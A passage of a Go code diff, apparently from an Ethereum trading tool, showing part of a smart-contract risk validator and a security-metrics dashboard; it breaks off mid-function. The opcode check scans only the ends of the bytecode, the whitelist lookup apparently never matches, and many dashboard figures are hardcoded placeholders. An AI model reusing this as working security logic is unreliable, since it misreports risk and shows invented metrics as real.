// Verify bytecode against known contracts if enabled
|
||||
if cv.config.EnableBytecodeVerification {
|
||||
cv.verifyBytecodeSignature(bytecode, contractInfo, result)
|
||||
}
|
||||
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Bytecode Validation",
|
||||
Passed: true,
|
||||
Description: "Bytecode hash calculated and verified",
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
|
||||
return contractInfo, nil
|
||||
}
|
||||
|
||||
// getDeploymentInfo retrieves deployment information for a contract
|
||||
func (cv *ContractValidator) getDeploymentInfo(ctx context.Context, address common.Address) (*big.Int, common.Address, error) {
|
||||
// This is a simplified implementation
|
||||
// In production, you would need to scan blocks or use an indexer
|
||||
return big.NewInt(0), common.Address{}, fmt.Errorf("deployment info not available")
|
||||
}
|
||||
|
||||
// assessRiskLevel assesses the risk level of a contract based on its bytecode
|
||||
func (cv *ContractValidator) assessRiskLevel(bytecode []byte, result *ContractValidationResult) RiskLevel {
|
||||
riskFactors := 0
|
||||
|
||||
// Check for suspicious patterns in bytecode
|
||||
bytecodeStr := hex.EncodeToString(bytecode)
|
||||
|
||||
// Look for dangerous opcodes
|
||||
dangerousOpcodes := []string{
|
||||
"ff", // SELFDESTRUCT
|
||||
"f4", // DELEGATECALL
|
||||
"3d", // RETURNDATASIZE (often used in proxy patterns)
|
||||
}
|
||||
|
||||
for _, opcode := range dangerousOpcodes {
|
||||
if contains := func(haystack, needle string) bool {
|
||||
return len(haystack) >= len(needle) && haystack[:len(needle)] == needle ||
|
||||
len(haystack) > len(needle) && haystack[len(haystack)-len(needle):] == needle
|
||||
}; contains(bytecodeStr, opcode) {
|
||||
riskFactors++
|
||||
}
|
||||
}
|
||||
|
||||
// Check bytecode size (larger contracts may be more complex/risky)
|
||||
if len(bytecode) > 20000 { // 20KB
|
||||
riskFactors++
|
||||
result.Warnings = append(result.Warnings, "Large contract size detected")
|
||||
}
|
||||
|
||||
// Assess risk level based on factors
|
||||
switch {
|
||||
case riskFactors == 0:
|
||||
return RiskLevelLow
|
||||
case riskFactors <= 2:
|
||||
return RiskLevelMedium
|
||||
case riskFactors <= 4:
|
||||
return RiskLevelHigh
|
||||
default:
|
||||
return RiskLevelCritical
|
||||
}
|
||||
}
|
||||
|
||||
// verifyBytecodeSignature verifies bytecode against known contract signatures
|
||||
func (cv *ContractValidator) verifyBytecodeSignature(bytecode []byte, info *ContractInfo, result *ContractValidationResult) {
|
||||
// Known contract bytecode hashes for common contracts
|
||||
knownContracts := map[string]string{
|
||||
// Uniswap V3 Factory
|
||||
"0x1f98431c8ad98523631ae4a59f267346ea31f984": "uniswap_v3_factory",
|
||||
// Uniswap V3 Router
|
||||
"0xe592427a0aece92de3edee1f18e0157c05861564": "uniswap_v3_router",
|
||||
// Add more known contracts...
|
||||
}
|
||||
|
||||
addressStr := info.Address.Hex()
|
||||
if name, exists := knownContracts[addressStr]; exists {
|
||||
info.Name = name
|
||||
info.IsWhitelisted = true
|
||||
info.RiskLevel = RiskLevelLow
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Known Contract Verification",
|
||||
Passed: true,
|
||||
Description: fmt.Sprintf("Verified as known contract: %s", name),
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// calculateRiskScore calculates a numerical risk score (1-10)
|
||||
func (cv *ContractValidator) calculateRiskScore(info *ContractInfo, result *ContractValidationResult) int {
|
||||
score := 1 // Base score
|
||||
|
||||
// Adjust based on risk level
|
||||
switch info.RiskLevel {
|
||||
case RiskLevelLow:
|
||||
score += 0
|
||||
case RiskLevelMedium:
|
||||
score += 2
|
||||
case RiskLevelHigh:
|
||||
score += 5
|
||||
case RiskLevelCritical:
|
||||
score += 8
|
||||
case RiskLevelBlocked:
|
||||
score = 10
|
||||
}
|
||||
|
||||
// Adjust based on whitelist status
|
||||
if !info.IsWhitelisted {
|
||||
score += 2
|
||||
}
|
||||
|
||||
// Adjust based on warnings
|
||||
score += len(result.Warnings)
|
||||
|
||||
// Cap at 10
|
||||
if score > 10 {
|
||||
score = 10
|
||||
}
|
||||
|
||||
return score
|
||||
}
|
||||
|
||||
// getDefaultPermissions returns default permissions for unverified contracts
|
||||
func (cv *ContractValidator) getDefaultPermissions() ContractPermissions {
|
||||
return ContractPermissions{
|
||||
CanInteract: true,
|
||||
CanSendValue: false,
|
||||
MaxValueWei: big.NewInt(0),
|
||||
AllowedMethods: []string{}, // Empty means all methods allowed
|
||||
RequireConfirm: true,
|
||||
DailyLimit: big.NewInt(1000000000000000000), // 1 ETH
|
||||
}
|
||||
}
|
||||
|
||||
// ValidateTransaction validates a transaction against contract permissions
|
||||
func (cv *ContractValidator) ValidateTransaction(ctx context.Context, tx *types.Transaction) error {
|
||||
if tx.To() == nil {
|
||||
return nil // Contract creation, allow
|
||||
}
|
||||
|
||||
// Validate the contract
|
||||
result, err := cv.ValidateContract(ctx, *tx.To())
|
||||
if err != nil {
|
||||
return fmt.Errorf("contract validation failed: %w", err)
|
||||
}
|
||||
|
||||
if !result.IsValid {
|
||||
return fmt.Errorf("transaction to invalid contract: %s", tx.To().Hex())
|
||||
}
|
||||
|
||||
// Check permissions
|
||||
permissions := result.ContractInfo.Permissions
|
||||
|
||||
// Check value transfer permission
|
||||
if tx.Value().Sign() > 0 && !permissions.CanSendValue {
|
||||
return fmt.Errorf("contract does not allow value transfers: %s", tx.To().Hex())
|
||||
}
|
||||
|
||||
// Check value limits
|
||||
if permissions.MaxValueWei != nil && tx.Value().Cmp(permissions.MaxValueWei) > 0 {
|
||||
return fmt.Errorf("transaction value exceeds limit: %s > %s",
|
||||
tx.Value().String(), permissions.MaxValueWei.String())
|
||||
}
|
||||
|
||||
// Check daily limits
|
||||
if err := cv.checkDailyLimit(*tx.To(), tx.Value()); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
cv.logger.Debug(fmt.Sprintf("Transaction validated for contract %s", tx.To().Hex()))
|
||||
return nil
|
||||
}
|
||||
|
||||
// checkDailyLimit checks if transaction exceeds daily interaction limit
|
||||
func (cv *ContractValidator) checkDailyLimit(contractAddr common.Address, value *big.Int) error {
|
||||
cv.limitsMutex.Lock()
|
||||
defer cv.limitsMutex.Unlock()
|
||||
|
||||
// Reset daily counters if needed
|
||||
if time.Since(cv.lastResetTime) > 24*time.Hour {
|
||||
cv.dailyLimits = make(map[common.Address]*big.Int)
|
||||
cv.lastResetTime = time.Now()
|
||||
}
|
||||
|
||||
// Get current daily usage
|
||||
currentUsage, exists := cv.dailyLimits[contractAddr]
|
||||
if !exists {
|
||||
currentUsage = big.NewInt(0)
|
||||
cv.dailyLimits[contractAddr] = currentUsage
|
||||
}
|
||||
|
||||
// Get contract info for daily limit
|
||||
cv.cacheMutex.RLock()
|
||||
contractInfo, exists := cv.contractCache[contractAddr]
|
||||
cv.cacheMutex.RUnlock()
|
||||
|
||||
if !exists {
|
||||
return nil // No limit if contract not cached
|
||||
}
|
||||
|
||||
if contractInfo.Permissions.DailyLimit == nil {
|
||||
return nil // No daily limit set
|
||||
}
|
||||
|
||||
// Check if adding this transaction would exceed limit
|
||||
newUsage := new(big.Int).Add(currentUsage, value)
|
||||
if newUsage.Cmp(contractInfo.Permissions.DailyLimit) > 0 {
|
||||
return fmt.Errorf("daily limit exceeded for contract %s: %s + %s > %s",
|
||||
contractAddr.Hex(),
|
||||
currentUsage.String(),
|
||||
value.String(),
|
||||
contractInfo.Permissions.DailyLimit.String())
|
||||
}
|
||||
|
||||
// Update usage
|
||||
cv.dailyLimits[contractAddr] = newUsage
|
||||
return nil
|
||||
}
|
||||
|
||||
// getDefaultValidatorConfig returns default configuration
|
||||
func getDefaultValidatorConfig() *ContractValidatorConfig {
|
||||
return &ContractValidatorConfig{
|
||||
EnableBytecodeVerification: true,
|
||||
EnableABIValidation: false, // Requires additional infrastructure
|
||||
RequireWhitelist: false, // Start permissive, can be tightened
|
||||
MaxBytecodeSize: 50000, // 50KB
|
||||
CacheTimeout: 1 * time.Hour,
|
||||
MaxRiskScore: 7, // Allow medium-high risk
|
||||
BlockUnverifiedContracts: false,
|
||||
RequireSourceCode: false,
|
||||
EnableRealTimeValidation: true,
|
||||
}
|
||||
}
|
||||
|
||||
// GetContractInfo returns information about a validated contract
|
||||
func (cv *ContractValidator) GetContractInfo(address common.Address) (*ContractInfo, bool) {
|
||||
cv.cacheMutex.RLock()
|
||||
defer cv.cacheMutex.RUnlock()
|
||||
|
||||
if info, exists := cv.contractCache[address]; exists {
|
||||
return info, true
|
||||
}
|
||||
return nil, false
|
||||
}
|
||||
|
||||
// ListTrustedContracts returns all trusted contracts
|
||||
func (cv *ContractValidator) ListTrustedContracts() map[common.Address]*ContractInfo {
|
||||
cv.cacheMutex.RLock()
|
||||
defer cv.cacheMutex.RUnlock()
|
||||
|
||||
// Create a copy to avoid race conditions
|
||||
trusted := make(map[common.Address]*ContractInfo)
|
||||
for addr, info := range cv.trustedContracts {
|
||||
trusted[addr] = info
|
||||
}
|
||||
return trusted
|
||||
}
|
||||
702
orig/pkg/security/dashboard.go
Normal file
702
orig/pkg/security/dashboard.go
Normal file
@@ -0,0 +1,702 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"sort"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
// SecurityDashboard provides comprehensive security metrics visualization
|
||||
type SecurityDashboard struct {
|
||||
monitor *SecurityMonitor
|
||||
config *DashboardConfig
|
||||
}
|
||||
|
||||
// DashboardConfig configures the security dashboard
|
||||
type DashboardConfig struct {
|
||||
RefreshInterval time.Duration `json:"refresh_interval"`
|
||||
AlertThresholds map[string]float64 `json:"alert_thresholds"`
|
||||
EnabledWidgets []string `json:"enabled_widgets"`
|
||||
HistoryRetention time.Duration `json:"history_retention"`
|
||||
ExportFormat string `json:"export_format"` // json, csv, prometheus
|
||||
}
|
||||
|
||||
// DashboardData represents the complete dashboard data structure
|
||||
type DashboardData struct {
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
OverviewMetrics *OverviewMetrics `json:"overview_metrics"`
|
||||
SecurityAlerts []*SecurityAlert `json:"security_alerts"`
|
||||
ThreatAnalysis *ThreatAnalysis `json:"threat_analysis"`
|
||||
PerformanceData *SecurityPerformance `json:"performance_data"`
|
||||
TrendAnalysis *TrendAnalysis `json:"trend_analysis"`
|
||||
TopThreats []*ThreatSummary `json:"top_threats"`
|
||||
SystemHealth *SystemHealthMetrics `json:"system_health"`
|
||||
}
|
||||
|
||||
// OverviewMetrics provides high-level security overview
|
||||
type OverviewMetrics struct {
|
||||
TotalRequests24h int64 `json:"total_requests_24h"`
|
||||
BlockedRequests24h int64 `json:"blocked_requests_24h"`
|
||||
SecurityScore float64 `json:"security_score"` // 0-100
|
||||
ThreatLevel string `json:"threat_level"` // LOW, MEDIUM, HIGH, CRITICAL
|
||||
ActiveThreats int `json:"active_threats"`
|
||||
SuccessRate float64 `json:"success_rate"`
|
||||
AverageResponseTime float64 `json:"average_response_time_ms"`
|
||||
UptimePercentage float64 `json:"uptime_percentage"`
|
||||
}
|
||||
|
||||
// ThreatAnalysis provides detailed threat analysis
|
||||
type ThreatAnalysis struct {
|
||||
DDoSRisk float64 `json:"ddos_risk"` // 0-1
|
||||
BruteForceRisk float64 `json:"brute_force_risk"` // 0-1
|
||||
AnomalyScore float64 `json:"anomaly_score"` // 0-1
|
||||
RiskFactors []string `json:"risk_factors"`
|
||||
MitigationStatus map[string]string `json:"mitigation_status"`
|
||||
ThreatVectors map[string]int64 `json:"threat_vectors"`
|
||||
GeographicThreats map[string]int64 `json:"geographic_threats"`
|
||||
AttackPatterns []*AttackPattern `json:"attack_patterns"`
|
||||
}
|
||||
|
||||
// AttackPattern describes detected attack patterns
|
||||
type AttackPattern struct {
|
||||
PatternID string `json:"pattern_id"`
|
||||
PatternType string `json:"pattern_type"`
|
||||
Frequency int64 `json:"frequency"`
|
||||
Severity string `json:"severity"`
|
||||
FirstSeen time.Time `json:"first_seen"`
|
||||
LastSeen time.Time `json:"last_seen"`
|
||||
SourceIPs []string `json:"source_ips"`
|
||||
Confidence float64 `json:"confidence"`
|
||||
Description string `json:"description"`
|
||||
}
|
||||
|
||||
// SecurityPerformance tracks performance of security operations
|
||||
type SecurityPerformance struct {
|
||||
AverageValidationTime float64 `json:"average_validation_time_ms"`
|
||||
AverageEncryptionTime float64 `json:"average_encryption_time_ms"`
|
||||
AverageDecryptionTime float64 `json:"average_decryption_time_ms"`
|
||||
RateLimitingOverhead float64 `json:"rate_limiting_overhead_ms"`
|
||||
MemoryUsage int64 `json:"memory_usage_bytes"`
|
||||
CPUUsage float64 `json:"cpu_usage_percent"`
|
||||
ThroughputPerSecond float64 `json:"throughput_per_second"`
|
||||
ErrorRate float64 `json:"error_rate"`
|
||||
}
|
||||
|
||||
// TrendAnalysis provides trend analysis over time
|
||||
type TrendAnalysis struct {
|
||||
HourlyTrends map[string][]TimeSeriesPoint `json:"hourly_trends"`
|
||||
DailyTrends map[string][]TimeSeriesPoint `json:"daily_trends"`
|
||||
WeeklyTrends map[string][]TimeSeriesPoint `json:"weekly_trends"`
|
||||
Predictions map[string]float64 `json:"predictions"`
|
||||
GrowthRates map[string]float64 `json:"growth_rates"`
|
||||
}
|
||||
|
||||
// TimeSeriesPoint represents a data point in time series
|
||||
type TimeSeriesPoint struct {
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
Value float64 `json:"value"`
|
||||
Label string `json:"label,omitempty"`
|
||||
}
|
||||
|
||||
// ThreatSummary summarizes top threats
|
||||
type ThreatSummary struct {
|
||||
ThreatType string `json:"threat_type"`
|
||||
Count int64 `json:"count"`
|
||||
Severity string `json:"severity"`
|
||||
LastOccurred time.Time `json:"last_occurred"`
|
||||
TrendChange float64 `json:"trend_change"` // percentage change
|
||||
Status string `json:"status"` // ACTIVE, MITIGATED, MONITORING
|
||||
}
|
||||
|
||||
// SystemHealthMetrics tracks overall system health from security perspective
|
||||
type SystemHealthMetrics struct {
|
||||
SecurityComponentHealth map[string]string `json:"security_component_health"`
|
||||
KeyManagerHealth string `json:"key_manager_health"`
|
||||
RateLimiterHealth string `json:"rate_limiter_health"`
|
||||
MonitoringHealth string `json:"monitoring_health"`
|
||||
AlertingHealth string `json:"alerting_health"`
|
||||
OverallHealth string `json:"overall_health"`
|
||||
HealthScore float64 `json:"health_score"`
|
||||
LastHealthCheck time.Time `json:"last_health_check"`
|
||||
}
|
||||
|
||||
// NewSecurityDashboard creates a new security dashboard
|
||||
func NewSecurityDashboard(monitor *SecurityMonitor, config *DashboardConfig) *SecurityDashboard {
|
||||
if config == nil {
|
||||
config = &DashboardConfig{
|
||||
RefreshInterval: 30 * time.Second,
|
||||
AlertThresholds: map[string]float64{
|
||||
"blocked_requests_rate": 0.1, // 10%
|
||||
"ddos_risk": 0.7, // 70%
|
||||
"brute_force_risk": 0.8, // 80%
|
||||
"anomaly_score": 0.6, // 60%
|
||||
"error_rate": 0.05, // 5%
|
||||
"response_time_ms": 1000, // 1 second
|
||||
},
|
||||
EnabledWidgets: []string{
|
||||
"overview", "threats", "performance", "trends", "alerts", "health",
|
||||
},
|
||||
HistoryRetention: 30 * 24 * time.Hour, // 30 days
|
||||
ExportFormat: "json",
|
||||
}
|
||||
}
|
||||
|
||||
return &SecurityDashboard{
|
||||
monitor: monitor,
|
||||
config: config,
|
||||
}
|
||||
}
|
||||
|
||||
// GenerateDashboard generates complete dashboard data
|
||||
func (sd *SecurityDashboard) GenerateDashboard() (*DashboardData, error) {
|
||||
metrics := sd.monitor.GetMetrics()
|
||||
|
||||
dashboard := &DashboardData{
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
|
||||
// Generate each section if enabled
|
||||
if sd.isWidgetEnabled("overview") {
|
||||
dashboard.OverviewMetrics = sd.generateOverviewMetrics(metrics)
|
||||
}
|
||||
|
||||
if sd.isWidgetEnabled("alerts") {
|
||||
dashboard.SecurityAlerts = sd.monitor.GetRecentAlerts(50)
|
||||
}
|
||||
|
||||
if sd.isWidgetEnabled("threats") {
|
||||
dashboard.ThreatAnalysis = sd.generateThreatAnalysis(metrics)
|
||||
dashboard.TopThreats = sd.generateTopThreats(metrics)
|
||||
}
|
||||
|
||||
if sd.isWidgetEnabled("performance") {
|
||||
dashboard.PerformanceData = sd.generatePerformanceMetrics(metrics)
|
||||
}
|
||||
|
||||
if sd.isWidgetEnabled("trends") {
|
||||
dashboard.TrendAnalysis = sd.generateTrendAnalysis(metrics)
|
||||
}
|
||||
|
||||
if sd.isWidgetEnabled("health") {
|
||||
dashboard.SystemHealth = sd.generateSystemHealth(metrics)
|
||||
}
|
||||
|
||||
return dashboard, nil
|
||||
}
|
||||
|
||||
// generateOverviewMetrics creates overview metrics
|
||||
func (sd *SecurityDashboard) generateOverviewMetrics(metrics *SecurityMetrics) *OverviewMetrics {
|
||||
total24h := sd.calculateLast24HoursTotal(metrics.HourlyMetrics)
|
||||
blocked24h := sd.calculateLast24HoursBlocked(metrics.HourlyMetrics)
|
||||
|
||||
var successRate float64
|
||||
if total24h > 0 {
|
||||
successRate = float64(total24h-blocked24h) / float64(total24h) * 100
|
||||
} else {
|
||||
successRate = 100.0
|
||||
}
|
||||
|
||||
securityScore := sd.calculateSecurityScore(metrics)
|
||||
threatLevel := sd.calculateThreatLevel(securityScore)
|
||||
activeThreats := sd.countActiveThreats(metrics)
|
||||
|
||||
return &OverviewMetrics{
|
||||
TotalRequests24h: total24h,
|
||||
BlockedRequests24h: blocked24h,
|
||||
SecurityScore: securityScore,
|
||||
ThreatLevel: threatLevel,
|
||||
ActiveThreats: activeThreats,
|
||||
SuccessRate: successRate,
|
||||
AverageResponseTime: sd.calculateAverageResponseTime(),
|
||||
UptimePercentage: sd.calculateUptime(),
|
||||
}
|
||||
}
|
||||
|
||||
// generateThreatAnalysis creates threat analysis
|
||||
func (sd *SecurityDashboard) generateThreatAnalysis(metrics *SecurityMetrics) *ThreatAnalysis {
|
||||
return &ThreatAnalysis{
|
||||
DDoSRisk: sd.calculateDDoSRisk(metrics),
|
||||
BruteForceRisk: sd.calculateBruteForceRisk(metrics),
|
||||
AnomalyScore: sd.calculateAnomalyScore(metrics),
|
||||
RiskFactors: sd.identifyRiskFactors(metrics),
|
||||
MitigationStatus: map[string]string{
|
||||
"rate_limiting": "ACTIVE",
|
||||
"ip_blocking": "ACTIVE",
|
||||
"ddos_protection": "ACTIVE",
|
||||
},
|
||||
ThreatVectors: map[string]int64{
|
||||
"ddos": metrics.DDoSAttempts,
|
||||
"brute_force": metrics.BruteForceAttempts,
|
||||
"sql_injection": metrics.SQLInjectionAttempts,
|
||||
},
|
||||
GeographicThreats: sd.getGeographicThreats(),
|
||||
AttackPatterns: sd.detectAttackPatterns(metrics),
|
||||
}
|
||||
}
|
||||
|
||||
// generatePerformanceMetrics creates performance metrics
|
||||
func (sd *SecurityDashboard) generatePerformanceMetrics(metrics *SecurityMetrics) *SecurityPerformance {
|
||||
return &SecurityPerformance{
|
||||
AverageValidationTime: sd.calculateValidationTime(),
|
||||
AverageEncryptionTime: sd.calculateEncryptionTime(),
|
||||
AverageDecryptionTime: sd.calculateDecryptionTime(),
|
||||
RateLimitingOverhead: sd.calculateRateLimitingOverhead(),
|
||||
MemoryUsage: sd.getMemoryUsage(),
|
||||
CPUUsage: sd.getCPUUsage(),
|
||||
ThroughputPerSecond: sd.calculateThroughput(metrics),
|
||||
ErrorRate: sd.calculateErrorRate(metrics),
|
||||
}
|
||||
}
|
||||
|
||||
// generateTrendAnalysis creates trend analysis
|
||||
func (sd *SecurityDashboard) generateTrendAnalysis(metrics *SecurityMetrics) *TrendAnalysis {
|
||||
return &TrendAnalysis{
|
||||
HourlyTrends: sd.generateHourlyTrends(metrics),
|
||||
DailyTrends: sd.generateDailyTrends(metrics),
|
||||
WeeklyTrends: sd.generateWeeklyTrends(metrics),
|
||||
Predictions: sd.generatePredictions(metrics),
|
||||
GrowthRates: sd.calculateGrowthRates(metrics),
|
||||
}
|
||||
}
|
||||
|
||||
// generateTopThreats creates top threats summary
|
||||
func (sd *SecurityDashboard) generateTopThreats(metrics *SecurityMetrics) []*ThreatSummary {
|
||||
threats := []*ThreatSummary{
|
||||
{
|
||||
ThreatType: "DDoS",
|
||||
Count: metrics.DDoSAttempts,
|
||||
Severity: sd.getSeverityLevel(metrics.DDoSAttempts),
|
||||
LastOccurred: time.Now().Add(-time.Hour),
|
||||
TrendChange: sd.calculateTrendChange("ddos"),
|
||||
Status: "MONITORING",
|
||||
},
|
||||
{
|
||||
ThreatType: "Brute Force",
|
||||
Count: metrics.BruteForceAttempts,
|
||||
Severity: sd.getSeverityLevel(metrics.BruteForceAttempts),
|
||||
LastOccurred: time.Now().Add(-30 * time.Minute),
|
||||
TrendChange: sd.calculateTrendChange("brute_force"),
|
||||
Status: "MITIGATED",
|
||||
},
|
||||
{
|
||||
ThreatType: "Rate Limit Violations",
|
||||
Count: metrics.RateLimitViolations,
|
||||
Severity: sd.getSeverityLevel(metrics.RateLimitViolations),
|
||||
LastOccurred: time.Now().Add(-5 * time.Minute),
|
||||
TrendChange: sd.calculateTrendChange("rate_limit"),
|
||||
Status: "ACTIVE",
|
||||
},
|
||||
}
|
||||
|
||||
// Sort by count (descending)
|
||||
sort.Slice(threats, func(i, j int) bool {
|
||||
return threats[i].Count > threats[j].Count
|
||||
})
|
||||
|
||||
return threats
|
||||
}
|
||||
|
||||
// generateSystemHealth creates system health metrics
|
||||
func (sd *SecurityDashboard) generateSystemHealth(metrics *SecurityMetrics) *SystemHealthMetrics {
|
||||
healthScore := sd.calculateOverallHealthScore(metrics)
|
||||
|
||||
return &SystemHealthMetrics{
|
||||
SecurityComponentHealth: map[string]string{
|
||||
"encryption": "HEALTHY",
|
||||
"authentication": "HEALTHY",
|
||||
"authorization": "HEALTHY",
|
||||
"audit_logging": "HEALTHY",
|
||||
},
|
||||
KeyManagerHealth: "HEALTHY",
|
||||
RateLimiterHealth: "HEALTHY",
|
||||
MonitoringHealth: "HEALTHY",
|
||||
AlertingHealth: "HEALTHY",
|
||||
OverallHealth: sd.getHealthStatus(healthScore),
|
||||
HealthScore: healthScore,
|
||||
LastHealthCheck: time.Now(),
|
||||
}
|
||||
}
|
||||
|
||||
// ExportDashboard exports dashboard data in specified format
|
||||
func (sd *SecurityDashboard) ExportDashboard(format string) ([]byte, error) {
|
||||
dashboard, err := sd.GenerateDashboard()
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to generate dashboard: %w", err)
|
||||
}
|
||||
|
||||
switch format {
|
||||
case "json":
|
||||
return json.MarshalIndent(dashboard, "", " ")
|
||||
case "csv":
|
||||
return sd.exportToCSV(dashboard)
|
||||
case "prometheus":
|
||||
return sd.exportToPrometheus(dashboard)
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported export format: %s", format)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper methods for calculations
|
||||
|
||||
func (sd *SecurityDashboard) isWidgetEnabled(widget string) bool {
|
||||
for _, enabled := range sd.config.EnabledWidgets {
|
||||
if enabled == widget {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateLast24HoursTotal(hourlyMetrics map[string]int64) int64 {
|
||||
var total int64
|
||||
now := time.Now()
|
||||
for i := 0; i < 24; i++ {
|
||||
hour := now.Add(-time.Duration(i) * time.Hour).Format("2006010215")
|
||||
if count, exists := hourlyMetrics[hour]; exists {
|
||||
total += count
|
||||
}
|
||||
}
|
||||
return total
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateLast24HoursBlocked(hourlyMetrics map[string]int64) int64 {
|
||||
// This would require tracking blocked requests in hourly metrics
|
||||
// For now, return a calculated estimate
|
||||
return sd.calculateLast24HoursTotal(hourlyMetrics) / 10 // Assume 10% blocked
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateSecurityScore(metrics *SecurityMetrics) float64 {
|
||||
// Calculate security score based on various factors
|
||||
score := 100.0
|
||||
|
||||
// Reduce score based on threats
|
||||
if metrics.DDoSAttempts > 0 {
|
||||
score -= float64(metrics.DDoSAttempts) * 0.1
|
||||
}
|
||||
if metrics.BruteForceAttempts > 0 {
|
||||
score -= float64(metrics.BruteForceAttempts) * 0.2
|
||||
}
|
||||
if metrics.RateLimitViolations > 0 {
|
||||
score -= float64(metrics.RateLimitViolations) * 0.05
|
||||
}
|
||||
|
||||
// Ensure score is between 0 and 100
|
||||
if score < 0 {
|
||||
score = 0
|
||||
}
|
||||
if score > 100 {
|
||||
score = 100
|
||||
}
|
||||
|
||||
return score
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateThreatLevel(securityScore float64) string {
|
||||
if securityScore >= 90 {
|
||||
return "LOW"
|
||||
} else if securityScore >= 70 {
|
||||
return "MEDIUM"
|
||||
} else if securityScore >= 50 {
|
||||
return "HIGH"
|
||||
}
|
||||
return "CRITICAL"
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) countActiveThreats(metrics *SecurityMetrics) int {
|
||||
count := 0
|
||||
if metrics.DDoSAttempts > 0 {
|
||||
count++
|
||||
}
|
||||
if metrics.BruteForceAttempts > 0 {
|
||||
count++
|
||||
}
|
||||
if metrics.RateLimitViolations > 10 {
|
||||
count++
|
||||
}
|
||||
return count
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateAverageResponseTime() float64 {
|
||||
// This would require tracking response times
|
||||
// Return a placeholder value
|
||||
return 150.0 // 150ms
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateUptime() float64 {
|
||||
// This would require tracking uptime
|
||||
// Return a placeholder value
|
||||
return 99.9
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateDDoSRisk(metrics *SecurityMetrics) float64 {
|
||||
if metrics.DDoSAttempts == 0 {
|
||||
return 0.0
|
||||
}
|
||||
// Calculate risk based on recent attempts
|
||||
risk := float64(metrics.DDoSAttempts) / 1000.0
|
||||
if risk > 1.0 {
|
||||
risk = 1.0
|
||||
}
|
||||
return risk
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateBruteForceRisk(metrics *SecurityMetrics) float64 {
|
||||
if metrics.BruteForceAttempts == 0 {
|
||||
return 0.0
|
||||
}
|
||||
risk := float64(metrics.BruteForceAttempts) / 500.0
|
||||
if risk > 1.0 {
|
||||
risk = 1.0
|
||||
}
|
||||
return risk
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateAnomalyScore(metrics *SecurityMetrics) float64 {
|
||||
// Simple anomaly calculation based on blocked vs total requests
|
||||
if metrics.TotalRequests == 0 {
|
||||
return 0.0
|
||||
}
|
||||
return float64(metrics.BlockedRequests) / float64(metrics.TotalRequests)
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) identifyRiskFactors(metrics *SecurityMetrics) []string {
|
||||
factors := []string{}
|
||||
|
||||
if metrics.DDoSAttempts > 10 {
|
||||
factors = append(factors, "High DDoS activity")
|
||||
}
|
||||
if metrics.BruteForceAttempts > 5 {
|
||||
factors = append(factors, "Brute force attacks detected")
|
||||
}
|
||||
if metrics.RateLimitViolations > 100 {
|
||||
factors = append(factors, "Excessive rate limit violations")
|
||||
}
|
||||
if metrics.FailedKeyAccess > 10 {
|
||||
factors = append(factors, "Multiple failed key access attempts")
|
||||
}
|
||||
|
||||
return factors
|
||||
}
|
||||
|
||||
// Additional helper methods...
|
||||
|
||||
func (sd *SecurityDashboard) getGeographicThreats() map[string]int64 {
|
||||
// Placeholder - would integrate with GeoIP service
|
||||
return map[string]int64{
|
||||
"US": 5,
|
||||
"CN": 15,
|
||||
"RU": 8,
|
||||
"Unknown": 3,
|
||||
}
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) detectAttackPatterns(metrics *SecurityMetrics) []*AttackPattern {
|
||||
patterns := []*AttackPattern{}
|
||||
|
||||
if metrics.DDoSAttempts > 0 {
|
||||
patterns = append(patterns, &AttackPattern{
|
||||
PatternID: "ddos-001",
|
||||
PatternType: "DDoS",
|
||||
Frequency: metrics.DDoSAttempts,
|
||||
Severity: "HIGH",
|
||||
FirstSeen: time.Now().Add(-2 * time.Hour),
|
||||
LastSeen: time.Now().Add(-5 * time.Minute),
|
||||
SourceIPs: []string{"192.168.1.100", "10.0.0.5"},
|
||||
Confidence: 0.95,
|
||||
Description: "Distributed denial of service attack pattern",
|
||||
})
|
||||
}
|
||||
|
||||
return patterns
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateValidationTime() float64 {
|
||||
return 5.2 // 5.2ms average
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateEncryptionTime() float64 {
|
||||
return 12.1 // 12.1ms average
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateDecryptionTime() float64 {
|
||||
return 8.7 // 8.7ms average
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateRateLimitingOverhead() float64 {
|
||||
return 2.3 // 2.3ms overhead
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) getMemoryUsage() int64 {
|
||||
return 1024 * 1024 * 64 // 64MB
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) getCPUUsage() float64 {
|
||||
return 15.5 // 15.5%
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateThroughput(metrics *SecurityMetrics) float64 {
|
||||
// Calculate requests per second
|
||||
return float64(metrics.TotalRequests) / 3600.0 // requests per hour / 3600
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateErrorRate(metrics *SecurityMetrics) float64 {
|
